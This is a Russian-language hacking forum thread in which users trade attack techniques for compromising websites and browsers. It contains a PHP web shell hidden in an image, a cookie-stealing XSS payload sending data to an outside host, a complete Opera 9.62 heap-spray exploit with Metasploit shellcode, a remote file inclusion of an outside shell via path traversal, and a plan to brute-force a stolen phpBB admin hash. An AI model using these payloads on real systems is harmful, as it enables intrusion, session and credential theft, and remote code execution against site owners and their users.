Процитирую тебя же 'Сам то понял что написал?', во первых нах ему переадресация без плушек и тд и судя по 'твой снифер' ты собераешься лить это снифер а не на фейк ? Во вторых - 16 символ обозначает 16 символов а не 66.
Кто нибуть может дать пример кода при котором можно выполнять команды с удаленного компьютера?(php сам знаю чуток но не представляю как это должно выглядеть)(интересно просто пощупать это так как с помощью этого взломали 2ip кто помнит(через whois проходила команда любая))
а ну так это то понятно! Но каким методом был взломан через whois(2ip.ru)? Или можно как то whois проверить через командную строку?
diznt, ну хз, как там был взломан, он, но если там можно выпонлять любые команты, то могли залить шелл, как угодно. "copy", "wget", etc...
Ладно... Такой вопрос... Как залить шелл через картинку? Пробывал для теста в коментах картинки оставить код <html><script>alert('xss!')</script></html> Но при переходе на картинку нету xss( (через ie 6 заходил)
Создал картинку в пэйнте 1 на 1, открыл её блокнотом и в конец с новой строки дописывай php код. <?php system($_GET['a']); ?> или лучше include($file). Ну и путь до картинки надо бэ знать. Или прямой или через инклуд.
я понял что написал,поздравляю что пощитал символы,глянул на глаз посколько в "<script>img=new Image(); img.src="http://сsite/snif/picture.gif"+document.cookie;</script>" будет на много больше символов,"твой снифер" я написал условно, да там куки не будет,но за то он смог бы перенаправлять юзеров на любые ресурсы в том числе и фэйки.
Ок. Значение Code: var evil = "calc.exe"; -он воспринимает странно. В адресной строке, после перезаполнения появляется следующее: Code: test.test.ru/calc.exeXXXXXXXXXXXXXXXXXXXXXXX Сам эксплоит: Code: <html> <head><title>uh?</title></head> <body> <script> // k`sOSe 11/15/2008 // tested on Windows XP SP3, opera 9.62 international version // vulnerability found by send9 // there are many ways to achieve code execution, tons of function pointers to overwrite. // maybe there's one more reliable... var i=0; // push es, pop es var block = unescape("%u0607%u0607"); // metasploit WinExec c:\WINDOWS\system32\calc.exe var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100"); while (block.length < 81920) block += block; var memory = new Array(); for (;i<1000;i++) memory[i] += (block + shellcode); var evil = "calc.exe"; for(var i = 0; i<86438; i++) evil += "X"; evil += "R."; window.location.replace(evil); </script> </body> </html>
насколько я понимаю в этих сплоитах(я понимаю не очень много) evil используется только для того чтобы вылезти из памяти приложения, то есть вызвать переполнение/overflow. сама же начинка лежит в переменной shellcode где и происходит вызов calc.exe upd по коду обрати внимание на комментарии особенно тут Code: // push es, pop es var block = unescape("%u0607%u0607"); // metasploit WinExec c:\WINDOWS\system32\calc.exe var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
Не пашет понятие растяжимое, если выпадает в error то значит в картинки какие то символы интерпретируется за начало php кода а если не пашет - не выполняеться код то значит не правильно что то делаешь с php кодом. З.Ы. ша дочитал что ты хочешь - что бы картинка выполнялась как php код ее нужно либо проинклюдить в этот самый php код либо добавить расширения картинки в addtype - что бы она исполнялась как php код - сама по себе она не исполниться и конечно в браузере ты не увидешь алерта - браузер будет интерпретировать то что передает сервер по соответствующему заголовку HTTP.
Собственно видел в видео что как то в картинку подставляли алерт... заходили по картинке (заливали ее в ручную на локалхост) и вылетал алерт не выполняеться код то значит не правильно что то делаешь с php кодом. да? делал как Ch3ck и все равно. И в инете все облазил и испробывал. Не хочет
Тебе уже 2 человека говорят - ЧТО НУЖНО ПРОИНКЛЮДИТЬ КАРТИНКУ В PHP КОД(который в итоге в баузере будет выводиться как текст с Content-type:text/html) или с недостаточной фильтрацией в Exif запихнуть туда код и тогда тебе и алерт будет и phpinfo(при условии что это инклюд без всяких фильтров) и в видео именно так и происходит.
так я инклудил (то есть в конце ставил <?php include("2.gif"); ?> 2.gif норм картинка в том же каталоге) но в итоге ничего не изменялось (вроде как)
Извините за глупый вопрос. Сколько символов минимальная длинна пароля в phpBB 2.0.17. Просто есть хэш админа и надо поставить на брут на ночь. Вот чтобы не брутить лишние надо узнать мин.длинну.
Странно... В конце картинки пишешь <?php include('http://site.com/shell.php'); ?> и запускаешь картинку http://site.com/index.php?path=../../../../../image.gif всё. Откроется шелл, если конечно allow_url_include=on.